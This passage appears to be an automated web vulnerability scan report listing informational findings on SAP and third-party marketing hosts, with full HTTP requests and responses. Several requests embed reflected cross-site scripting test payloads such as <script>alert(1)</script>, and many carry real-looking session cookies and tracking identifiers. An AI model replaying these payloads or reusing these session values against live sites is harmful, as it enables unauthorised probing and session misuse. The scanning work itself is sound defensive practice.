23.12. http://www.sapvirtualevents.com/JControls/Header/template/header.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /JControls/Header/template/header.htm

Request

GET /JControls/Header/template/header.htm HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; __utma=217282836.383781452.1318689024.1318689024.1318689024.1; __utmb=217282836.2.10.1318689025; __utmc=217282836; __utmz=217282836.1318689025.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.1.cbc3=7b9b230ebda00332.1318689026.1.1318689026.1318689026.; _pk_ses.1.cbc3=*

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Aug 2011 10:52:36 GMT
Accept-Ranges: bytes
ETag: "0322fc6cb5ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:30 GMT
Content-Length: 1854

...    <div id="nav">
<ul>
{#foreach $T.d.LinkLevel1_List as record}
{#if $T.record$iteration == 0 || $T.record$iteration == 1 || $T.record$iteration == 2}
{#if $T.record.IsActive == 1}
...[SNIP]...
23.13. http://www.sapvirtualevents.com/JControls/News/template/SAPNews.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /JControls/News/template/SAPNews.htm

Request

GET /JControls/News/template/SAPNews.htm HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; __utma=217282836.383781452.1318689024.1318689024.1318689024.1; __utmb=217282836.2.10.1318689025; __utmc=217282836; __utmz=217282836.1318689025.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.1.cbc3=7b9b230ebda00332.1318689026.1.1318689026.1318689026.; _pk_ses.1.cbc3=*

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 31 Aug 2011 14:38:28 GMT
Accept-Ranges: bytes
ETag: "0ca96a5eb67cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:31 GMT
Content-Length: 1025

...<div id="wrapper_" style="color:#eeeeee;">
<div class="newsslider">
<div style="top: 0px; opacity: 1;" class="newsslidercontent" id="newsslider" >
{#foreach $T.d as reco
...[SNIP]...
23.14. http://www.sapvirtualevents.com/Jcontrols/Sessions/template/tabularCalMCL.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /Jcontrols/Sessions/template/tabularCalMCL.htm

Request

GET /Jcontrols/Sessions/template/tabularCalMCL.htm HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; __utma=217282836.383781452.1318689024.1318689024.1318689024.1; __utmb=217282836.2.10.1318689025; __utmc=217282836; __utmz=217282836.1318689025.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.1.cbc3=7b9b230ebda00332.1318689026.1.1318689026.1318689026.; _pk_ses.1.cbc3=*

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 04 Oct 2011 05:34:48 GMT
Accept-Ranges: bytes
ETag: "04c99545782cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:28 GMT
Content-Length: 1672

... {#if $T.d.TotalRecords!=0}
<input type ="hidden" id = "hiddenTotalcountfilter" value = "{$T.d.TotalRecords}" />
{#foreach $T.d.records as record} {#if $T.record$iteration % 3 == 0}
<field
...[SNIP]...
23.15. https://www.sme.sap.com/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html

Request

GET /irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sme.sap.com/irj/sme/logon
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000; a1slocale=en; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; PortalAlias=sme

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERENzctRDcwRDRENEJGQjk0QkM3MQ==
Cache-Control: max-age=86400
Vary: Accept-Encoding
Content-Length: 255
Date: Sat, 15 Oct 2011 14:33:55 GMT
Connection: keep-alive

<html>
<head>
   <title></title>
</head>
<script language="JavaScript">
var x = location.hostname.indexOf('.')+1;
if (x>0) document.domain = location.hostname.substring(x);
</sc
...[SNIP]...
24. Content type incorrectly stated  previous  next
There are 26 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

24.1. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 80
Cache-Control: public, max-age=86360
Expires: Sun, 16 Oct 2011 15:28:23 GMT
Date: Sat, 15 Oct 2011 15:29:03 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</script>b80a639f654/style.css
24.2. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /visitor/v200/svrGP.aspx?pps=70&siteid=892&ref=http://www.omniture.com/en/%23%0Afunction%20Xss%28%29{alert%28%27XSS%27%29%3B}&ms=7 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 13:47:01 GMT
Content-Length: 86


function GetElqCustomerGUID(){ return 'f788d26b-a328-4c76-a75e-75f5d13f522a'; }
24.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&profile.geo_continent_code=6&profile.geo_area_code=802&profile.tnt_customer=false&profile.customer_status=prospect&profile.language=en&mbox=omniTargetingInfo&mboxId=1&mboxTime=1318668441246&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:03 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 172
Date: Sat, 15 Oct 2011 13:47:02 GMT
Server: Test & Target

mboxFactories.get('default').get('omniTargetingInfo',1).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");
24.4. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=37021986 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 200 OK
Content-Length: 17382
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=37021986
Last-Modified: Fri, 26 Aug 2011 22:16:06 GMT
Accept-Ranges: bytes
ETag: "70632ec03d64cc1:1d59"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:21:12 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
24.5. https://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=37021986 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL

Response

HTTP/1.1 200 OK
Content-Length: 17382
Content-Type: application/x-javascript
Content-Location: https://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=37021986
Last-Modified: Fri, 26 Aug 2011 22:16:06 GMT
Accept-Ranges: bytes
ETag: "70632ec03d64cc1:1995"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:27:11 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
24.6. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; s_sv_p1=1@26@s/7243/7019/7341/6423&e/15; mbox=check#true#1318631931|session#1318631777052-118529#1318633731|PC#1318631777052-118529.19#1319841471; mbox-staging=check#true#1318631939|session#1318631787015-280970#1318633739|PC#1318631787015-280970.19#1319841479

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 15 Oct 2011 17:47:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 483
Content-Type: application/javascript
Date: Sat, 15 Oct 2011 13:47:00 GMT
Connection: close
Set-Cookie: omniture_unique=fe0e6c91699884f68443ba47d4700abf; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=50.23.123.106',
'profile.geo_zip=05672',
'profile.geo_gmt_offset=-400',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region=v
...[SNIP]...
24.7. http://smepartnerfinder.sap.com/services/KeepAlive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://smepartnerfinder.sap.com
Path:   /services/KeepAlive.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /services/KeepAlive.aspx HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
Content-Length: 12
Origin: http://smepartnerfinder.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: text/xml
Accept: */*
Referer: http://smepartnerfinder.sap.com/Media/Flash/AppShell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

<formData />

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:09 GMT
Content-Length: 100

<?xml version="1.0" encoding="utf-8"?><content><outcome success="1" reqId="" command="" /></content>
24.8. http://smepartnerfinder.sap.com/services/LeadGeneration/Initialize.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://smepartnerfinder.sap.com
Path:   /services/LeadGeneration/Initialize.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /services/LeadGeneration/Initialize.aspx HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
Content-Length: 32
Origin: http://smepartnerfinder.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: text/xml
Accept: */*
Referer: http://smepartnerfinder.sap.com/Media/Flash/AppShell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg

<formData frontendVersion='1'/>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:28:04 GMT
Content-Length: 100

<?xml version="1.0" encoding="utf-8"?><content><outcome success="1" reqId="" command="" /></content>
24.9. http://smepartnerfinder.sap.com/services/LeadGeneration/RegisterClick.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://smepartnerfinder.sap.com
Path:   /services/LeadGeneration/RegisterClick.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /services/LeadGeneration/RegisterClick.aspx HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
Content-Length: 40
Origin: http://smepartnerfinder.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: text/xml
Accept: */*
Referer: http://smepartnerfinder.sap.com/Media/Flash/AppShell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
